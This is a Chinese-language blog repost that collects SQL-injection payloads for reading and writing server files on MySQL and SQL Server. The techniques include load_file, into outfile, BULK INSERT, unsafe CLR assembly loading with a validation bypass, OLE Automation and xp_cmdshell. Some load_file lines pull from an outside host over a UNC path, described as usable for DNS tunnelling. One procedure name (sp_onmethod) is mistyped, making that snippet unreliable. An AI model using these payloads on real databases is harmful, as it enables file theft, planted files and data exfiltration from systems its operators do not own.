服务器之家:专注于服务器技术及软件下载分享
分类导航

Mysql|Sql Server|Oracle|Redis|MongoDB|PostgreSQL|Sqlite|DB2|mariadb|Access|数据库技术|

服务器之家 - 数据库 - 数据库技术 - 关于SQL注入中文件读写的方法总结

关于SQL注入中文件读写的方法总结

2021-10-28 16:38该隐 数据库技术

这篇文章主要给大家介绍了关于SQL注入中文件的读写方法,文中通过示例代码介绍的非常详细,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。

前言

SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。

一、MySQL

读文件

常见的读文件,可以用16进制代替字符串

?
1
2
3
4
select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt') # smb协议
select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道

写文件

我暂时已知l两种写文件的方式

?
1
select 0x313233 into outfile 'D:/1.txt'
?
1
select 0x313233 into dumpfile 'D:/1.txt'

二、 SQL Server

读文件

1. BULK INSERT

?
1
2
create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';

2. CLR集成

?
1
2
3
4
5
// 开启CLR集成
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'clr enabled',1
reconfigure
?
1
create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式

?
1
select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。

?
1
2
3
create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt'
alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

?
1
2
3
4
5
6
# 开启Ole Automation Procedures
 
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;
?
1
2
3
4
5
6
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_onmethod @f, 'readline', @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

写文件

1. Script.FileSystemObject

?
1
2
3
4
5
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP复制文件(测试失败,无bcp.exe)

?
1
c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

?
1
exec xp_cmdshell 'echo test>d:\1.txt'

三、Oracle

pass,Oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论

总结

以上就是关于SQL注入中文件的读写方法总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流。

原文链接:http://ecma.io/?p=392

  • 文件读写
  • SQL注入

    • 延伸 · 阅读

    精彩推荐
    最近更新
    编辑推荐
    阅读排行
    热门标签
    3680   10038   压缩解压   汇总   连续序号   隐藏开销   datastage   dsjob   关系连接   移动加权   平均算法   DB驱动   DB连接串   MDAC   规范化   TSDB   列式数据库   Trafodion   异构数据库   存储系统   交付   LSM   CAP定理   iwms   数据库平台   合区   where 1=1   dba_indexes   rpm-ostree   更新日志  
    © 2019-2023 服务器之家(www.zzvips.com) 版权所有关于我们联系我们版权申明网站地图